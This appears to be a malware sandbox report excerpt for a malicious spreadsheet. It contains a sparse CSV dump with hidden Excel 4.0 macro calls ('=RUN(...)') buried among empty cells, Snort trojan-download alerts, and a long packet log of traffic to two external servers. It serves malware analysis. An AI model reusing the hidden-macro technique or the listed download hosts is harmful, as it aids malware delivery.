,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,59,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,x,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($L$1964),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($DC$690),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/27/20-10:30:46.137636	TCP	2022566	ET TROJAN Possible Malicious Macro EXE DL AlphaNumL	49709	80	192.168.1.102	85.239.35.110
05/27/20-10:30:46.137636	TCP	2022550	ET TROJAN Possible Malicious Macro DL EXE Feb 2016	49709	80	192.168.1.102	85.239.35.110

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2020 10:30:46.084634066 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.129986048 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.136383057 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.137635946 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.182981968 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.183968067 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.184025049 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.184052944 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.184096098 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.184122086 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.184156895 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.184182882 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.184218884 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.184245110 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.184269905 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.185754061 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.231329918 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231364965 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231384993 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231401920 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231466055 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231498957 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231520891 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231534004 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231596947 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231611967 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231652975 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231674910 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231688976 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231749058 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231762886 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231820107 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231837988 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231880903 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231908083 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.231920958 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.232445955 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.234996080 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.235256910 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.278048992 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278094053 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278170109 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278213024 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278254986 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278286934 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278310061 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278332949 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278357983 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278378963 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278412104 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278434038 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278456926 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278490067 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278511047 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278532028 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278558969 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.278579950 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280184984 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280217886 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280457020 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280484915 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280502081 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280528069 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280549049 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280580044 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280599117 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280622005 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280652046 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280672073 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280736923 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280770063 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280788898 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280807018 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280826092 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280916929 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280956030 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280963898 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280975103 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.280993938 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.286689043 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.290635109 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.298922062 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.304668903 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.305546045 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.332145929 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332184076 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332272053 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332299948 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332427979 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332465887 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332478046 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332515001 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332535982 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332566977 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332586050 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332619905 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332640886 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332678080 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332704067 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.332735062 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.334512949 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.336270094 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336302042 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336329937 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336410999 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336446047 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336473942 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336507082 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336527109 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336551905 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336579084 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336596966 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336637974 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336677074 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336750031 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336770058 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336800098 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336823940 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336848974 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336873055 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.336889982 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.340460062 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.341747046 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.342206001 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.342448950 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.344288111 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344330072 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344351053 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344558001 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344603062 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344626904 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344661951 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344686031 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344707012 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344738007 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344744921 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344767094 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344789982 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344805956 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344898939 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344932079 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344958067 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.344983101 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:46.345525026 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:46.346090078 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:30:56.280584097 CEST	80	49709	85.239.35.110	192.168.1.102
May 27, 2020 10:30:56.283664942 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:32:14.295787096 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:14.296053886 CEST	49712	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:14.374550104 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:14.375437975 CEST	80	49712	89.111.132.159	192.168.1.102
May 27, 2020 10:32:14.381464005 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:14.381515026 CEST	49712	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:14.383591890 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:14.462635040 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048496962 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048542976 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048562050 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048578978 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048595905 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048618078 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048635006 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048651934 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048671007 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048690081 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.048968077 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.185204029 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:32:15.235528946 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.235560894 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.235589027 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.235603094 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.235618114 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.235634089 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.235660076 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.235676050 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.235691071 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.235706091 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.236305952 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.237121105 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.237150908 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.237164974 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.237198114 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.237214088 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.237230062 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.237495899 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.237550020 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.237575054 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.237596035 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.238159895 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.315445900 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.315490007 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.315507889 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.315538883 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.315553904 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.315570116 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.315602064 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.315639973 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.315949917 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.315980911 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.316004992 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.316026926 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.316044092 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.316091061 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.316108942 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.317965984 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.318044901 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.423243046 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423276901 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423290968 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423302889 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423315048 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423377037 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423403025 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423424959 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423446894 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423501015 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423530102 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423551083 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423574924 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.423691034 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.423851013 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.425322056 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425345898 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425359011 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425442934 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425457001 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425481081 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425503969 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425527096 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425587893 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425611019 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425632000 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.425657988 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.427499056 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.427540064 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.427561045 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.427741051 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.427830935 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.427858114 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.427881956 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.427916050 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.427927017 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.428688049 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.428718090 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.428786993 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.428838015 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.428900957 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.428961039 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.429034948 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.429049969 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.429122925 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.429137945 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.429152012 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.429168940 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.430424929 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.436865091 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.437064886 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.437164068 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.499372959 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:32:15.502774954 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.516761065 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.609246016 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609263897 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609322071 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609347105 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609368086 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609390020 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609411001 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609488964 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609514952 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609539032 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609560966 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609584093 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.609606028 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.610203028 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.610476971 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.611506939 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611550093 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611574888 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611598015 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611619949 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611640930 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611664057 CEST	80	49711	89.111.132.159	192.168.1.102
